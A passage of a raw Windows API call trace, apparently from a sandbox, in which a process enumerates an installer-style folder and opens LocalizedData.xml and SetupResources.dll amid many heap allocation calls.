hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0061.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0061.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.507] AreFileApisANSI () returned 1 [0061.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.508] AreFileApisANSI () returned 1 [0061.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0061.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 45 [0061.508] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.509] GetFileType (hFile=0x41c) returned 0x1 [0061.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.509] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.509] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.509] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.509] CloseHandle (hObject=0x41c) returned 1 [0061.509] AreFileApisANSI () returned 1 [0061.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0061.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 45 [0061.510] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.510] GetFileType (hFile=0x41c) returned 0x1 [0061.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0061.510] CloseHandle (hObject=0x41c) returned 1 [0061.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.511] AreFileApisANSI () returned 1 [0061.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71758 [0061.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 45 [0061.511] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70)) returned 1 [0061.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0061.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.511] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0061.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0061.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0061.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.512] AreFileApisANSI () returned 1 [0061.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1053\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1053\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.512] AreFileApisANSI () returned 1 [0061.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0061.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 46 [0061.512] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.512] GetFileType (hFile=0x41c) returned 0x1 [0061.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.513] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.513] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.513] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.513] CloseHandle (hObject=0x41c) returned 1 [0061.513] AreFileApisANSI () returned 1 [0061.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0061.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 46 [0061.513] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.514] GetFileType (hFile=0x41c) returned 0x1 [0061.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.514] CloseHandle (hObject=0x41c) returned 1 [0061.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.514] AreFileApisANSI () returned 1 [0061.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a98 [0061.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 46 [0061.515] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558)) returned 1 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.515] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x467c0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䕘")) returned 0 [0061.515] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0061.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0061.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0061.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0061.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0061.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, 